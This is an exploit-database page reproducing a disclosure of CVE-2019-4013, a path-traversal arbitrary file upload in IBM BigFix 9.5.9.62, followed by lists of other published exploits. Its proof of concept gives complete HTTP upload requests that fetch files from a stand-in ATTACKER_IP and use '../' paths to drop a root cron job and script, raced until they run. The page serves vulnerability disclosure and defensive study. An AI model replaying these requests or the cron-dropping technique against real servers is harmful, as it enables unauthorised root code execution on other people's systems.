Menu

Search for hundreds of thousands of exploits

"IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload"

Author

Exploit author

"Jakub Palaczynski"

Platform

Exploit platform

java

Release date

Exploit published date

2019-10-07

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
# Exploit Title: IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload
# Date: 2018-12-11
# Exploit Authors: Jakub Palaczynski
# Vendor Homepage: https://www.ibm.com/
# Version: IBM Bigfix Platform <= 9.5.9.62
# CVE: CVE-2019-4013


Description:
============

Any authenticated (even unprivileged) user can upload any file to any location on the server with root privileges. This results in code execution on underlying system with root privileges.

What caused this issue:
* path traversal - it is possible to escape from original directory and upload file to any other location
* server running with root privileges - user can upload file to ANY location on the system
* upload any type of file - application does not verify extension and MIME type of uploaded files
* authorization bypass (reported as separate issue) - any user can reveal privileged functionality and access it without proper rights set
* possibility to win the race - application uploads file to location specified in "urlFileName" parameter (path traversal), however it then moves it to another. An attacker needs to win race and execute script before it is moved.

Issue was found in "Apps > Software > Add Software" menu. Here user needs to choose upload via URL option as only this one is vulnerable.
URL needs to point to attacker's web server where he hosts for example script files.
When form is submitted we can see on proxy "urlFileName" parameter. This one is vulnerable to path traversal. This parameter specifies temporary file name that will be used on the system. Then application moves this file to another location that is not controlled by application user.

An attacker can for example upload script file on the web server and execute it by sending GET request. However as a PoC we will use cron. Here we upload 2 files - cron file and script file that will be executed by cron.
Uploading cron task and script file is the same as below but of course with different content downloaded from the web server. Those two HTTP requests should be sent in loop to finally win a race and execute our script.


Proof of Concept:
=================

cron.txt served on attacker's web server:
* * * * * root bash /tmp/icmp.sh

icmp.txt served on attacker's web server:
#!/bin/bash
ping -c 3 ATTACKER_IP


Uploading cron task:
POST /swd/api/packages/upload HTTP/1.1

Host: XXX

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36

Content-Length: 846

Content-Type: multipart/form-data; boundary=---------------------------7289782871626994727576601809

X-XSRF-TOKEN: XXX

Cookie: _csrf=XXX; XSRF-TOKEN=XXX; user_session=XXX

Connection: close



-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="fileURL"



http://ATTACKER_IP/cron.txt

-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="username"





-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="password"





-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="urlFileName"



../../../../../../../../etc/cron.d/task

-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="urlDownloadAtRuntime"



false

-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="uploadId"



user_1543410578364620

-----------------------------7289782871626994727576601809--


Uploading script file:
POST /swd/api/packages/upload HTTP/1.1

Host: XXX

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36

Content-Length: 846

Content-Type: multipart/form-data; boundary=---------------------------7289782871626994727576601809

X-XSRF-TOKEN: XXX

Cookie: _csrf=XXX; XSRF-TOKEN=XXX; user_session=XXX

Connection: close



-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="fileURL"



http://ATTACKER_IP/icmp.txt

-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="username"





-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="password"





-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="urlFileName"



../../../../../../../../tmp/icmp.sh

-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="urlDownloadAtRuntime"



false

-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="uploadId"



user_1543410578364620

-----------------------------7289782871626994727576601809--


After a while our script should be executed with root privileges.
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-02 "Apache Flink 1.9.x - File Upload RCE (Unauthenticated)" webapps java bigger.wing
2020-10-29 "WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request" webapps java "Mohammed Althibyani"
2020-10-20 "Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution" webapps java "Jonatas Fil"
2020-10-19 "Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in" webapps java "Daniel Morris"
2020-09-09 "Scopia XT Desktop 8.3.915.4 - Cross-Site Request Forgery (change admin password)" webapps java V1n1v131r4
2020-09-07 "ManageEngine Applications Manager 14700 - Remote Code Execution (Authenticated)" webapps java Hodorsec
2020-08-10 "ManageEngine ADSelfService Build prior to 6003 - Remote Code Execution (Unauthenticated)" webapps java "Bhadresh Patel"
2020-07-26 "ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection" webapps java aldorm
2020-07-07 "Exhibitor Web UI 1.7.1 - Remote Code Execution" webapps java "Logan Sanderson"
2020-06-04 "VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution" webapps java "Tomas Melicher"
Release Date Title Type Platform Author
2020-07-06 "RSA IG&L Aveksa 7.1.1 - Remote Code Execution" webapps multiple "Jakub Palaczynski"
2019-10-07 "CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation" local windows "Jakub Palaczynski"
2019-10-07 "IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload" webapps java "Jakub Palaczynski"
2019-05-21 "Brocade Network Advisor 14.4.1 - Unauthenticated Remote Code Execution" webapps java "Jakub Palaczynski"
2018-11-05 "Royal TS/X - Information Disclosure" webapps json "Jakub Palaczynski"
2018-10-31 "Loadbalancer.org Enterprise VA MAX 8.3.2 - Remote Code Execution" webapps php "Jakub Palaczynski"
2018-09-17 "CA Release Automation NiMi 6.5 - Remote Command Execution" remote java "Jakub Palaczynski"
2017-12-13 "Meinberg LANTIME Web Configuration Utility 6.16.008 - Arbitrary File Read" webapps cgi "Jakub Palaczynski"
2017-09-13 "Astaro Security Gateway 7 - Remote Code Execution" remote hardware "Jakub Palaczynski"
2016-10-20 "Oracle BI Publisher 11.1.1.6.0/11.1.1.7.0/11.1.1.9.0/12.2.1.0.0 - XML External Entity Injection" webapps xml "Jakub Palaczynski"
2015-06-10 "HP WebInspect 10.4 - XML External Entity Injection" webapps xml "Jakub Palaczynski"
2014-12-12 "IBM Tivoli Service Automation Manager 7.2.4 - Remote Code Execution" webapps jsp "Jakub Palaczynski"
2014-12-10 "Apache James Server 2.3.2 - Remote Command Execution" remote linux "Jakub Palaczynski" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected